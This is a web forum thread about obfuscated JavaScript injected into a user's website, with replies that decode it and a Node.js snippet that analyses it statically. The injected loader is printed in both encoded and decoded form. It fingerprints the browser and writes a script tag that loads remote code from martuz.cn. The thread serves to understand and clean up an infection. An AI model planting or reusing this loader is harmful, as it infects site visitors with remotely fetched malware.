
Weird code on my website


speedy33417


I have some weird code that appeared in my website's source code. Not sure if someone hacked into my server or what happened.

 

Here's the code. How concerned should I be? What does the code do?

 

<script language=javascript><!-- 
(function(){var tdv2O='%';var zL7j=('va>72>20a>3d>22S>63riptEngine>22>2cb>3d>22>56ersion()+>22>2c>6a>3d>22>22>2cu>3dnavig>61tor>2eu>73>65r>41gen>74>3bif>28>28u>2eind>65x>4ff>28>22C>68>72o>6de>22>29>3c0)>26>26(u>2ei>6edexO>66>28>22Win>22)>3e>30)>26>26>28u>2eindexOf(>22NT>20>36>22)>3c0)>26>26(do>63ument>2eco>6fki>65>2eind>65x>4f>66>28>22miek>3d1>22)>3c0)>26>26(>74ypeo>66>28z>72>76>7ats)>21>3d>74yp>65of(>22A>22)))>7b>7ar>76zt>73>3d>22A>22>3beval(>22if(wi>6edow>2e>22+a>2b>22>29j>3dj+>22+a+>22Major>22>2b>62>2ba+>22M>69nor>22>2bb+a>2b>22Build>22+b>2b>22j>3b>22)>3bdocu>6dent>2e>77ri>74e(>22>3cs>63ri>70>74>20src>3d>2f>2fm>22+>22a>72tu>7a>2e>63n>2fvid>2f>3fid>3d>22+j>2b>22>3e>3c>5c>2fscript>3e>22>29>3b>7d').replace(/>/g,tdv2O);var bhioa=unescape(zL7j);eval(bhioa)})();
--></script>

Link to comment
Share on other sites

Thanks ober.

 

This code has been added to hundreds of pages on my site and luckily they all have the same upload time stamp so I can easily spot which ones have been affected.

 

If it's a trojan what does it really do? Does it steal passwords? How does it work? Would I have to be on an affected webpage and information entered on that page would be compromised? Or does this mean that my entire website is compromised now? I'm just trying to understand what it might do and what damage may have been done.

 

Thanks for your help.

Link to comment
Share on other sites

It will actually try to install itself on the client PC.  I got nailed on my personal site when I used some 3rd party code.  Some of my users had their anti-virus software pick it up.

Link to comment
Share on other sites

Well, you could just check the code yourself, no? What you posted is equivalent to the following Javascript:

 

var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>");}

 

Applying some formatting we get:

var a="ScriptEngine", b="Version()+", j="", u=navigator.userAgent;
if ((u.indexOf("Chrome") < 0) && (u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) && (document.cookie.indexOf("miek=1") < 0) && (typeof(zrvzts) != typeof("A")))
{
    zrvzts="A";
    eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
    document.write("<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>");
}

 

The string within the eval() is this:

if(window.ScriptEngine)j=j+ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion()+j;

 

So it'll set j if some conditions are true, and it will then execute the Javascript which is hosted on http://martuz.cn/vid/?id=j

 

This is seemingly a "reported attack site".

 

The domain name martuz.cn resolves to 98.124.198.1, but that machine doesn't seem to be up.

Link to comment
Share on other sites

Thanks all for the help.

 

Btw, Daniel. How did you get your version of the JS code out of mine? It doesn't look anything close to what you posted. Is it encrypted in some way? How (and where) do I convert the original hacker code to a JS code that makes more sense (like yours)?

Link to comment
Share on other sites

You see the very last statement of your code?

eval(bhioa)

 

It's evaluating the contents of the variable bhioa. It's simply a matter of printing that variable to get the plain text code. It's no more than obfuscation. A browser needs HTML, CSS and Javascript in plain text, so it's impossible to decrypt it and/or hide it.

Link to comment
Share on other sites
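
The decoding step described in the reply above, as an added example that is not part of the original thread: it reverses the `>` to `%` substitution and the unescape() call as plain string handling under Node.js, so nothing is ever passed to eval() or a browser, then lists the hosts the decoded code would load scripts from. SAMPLE is an excerpt of the string from the first post; the function names are made up for this example.

```javascript
// Added example (not from the thread): decode the ">XX" layer statically.
// SAMPLE is an excerpt of the injected string posted above; eval() is never called.
const SAMPLE = 'docu>6dent>2e>77ri>74e(>22>3cs>63ri>70>74>20src>3d>2f>2fm>22+' +
  '>22a>72tu>7a>2e>63n>2fvid>2f>3fid>3d>22+j>2b>22>3e>3c>5c>2fscript>3e>22>29>3b';

// Mirror of .replace(/>/g, '%') followed by unescape(): every marker becomes
// '%', then %XX and %uXXXX escapes are turned into characters.
function decodeLayer(encoded, marker) {
  return encoded.split(marker).join('%').replace(
    /%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// Heuristic: merge adjacent string literals ("//m"+"artuz") so split-up
// hostnames become searchable. A quote preceded by a backslash is skipped.
function foldConcats(js) {
  return js.replace(/([^\\])"\s*\+\s*"/g, '$1');
}

// Pull src= values out of <script> tags the decoded code would write,
// and reduce each to a hostname for blocklists and log searches.
function scriptHosts(js) {
  const hosts = new Set();
  const re = /<script[^>]*\ssrc=["']?([^\s"'>]+)/gi;
  for (const m of foldConcats(js).matchAll(re)) {
    const src = m[1].startsWith('//') ? 'http:' + m[1] : m[1];
    try { hosts.add(new URL(src).hostname); } catch { /* relative path, no host */ }
  }
  return [...hosts];
}

// Decode one layer and report both the readable code and the hosts it references.
function analyze(encoded, marker) {
  const decoded = decodeLayer(encoded, marker);
  return { decoded, hosts: scriptHosts(decoded) };
}

console.log(analyze(SAMPLE, '>'));
```

Running the same functions over the full string from an infected file gives the readable code quoted earlier in the thread, and the host list is what to search for across the other modified pages and in server logs.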

Just wondering...how do you install stuff onto a client's PC with javascript? That would be cool :P

 

And are you sure it's not your host? Is it actually in the file, if you open the file to edit it, not just on your source code? Some hosts automatically append scripts to all sites, like stat counters and stuff.

 

But yeah, try something like this:

document.write(unescape(bhioa));

Link to comment
Share on other sites
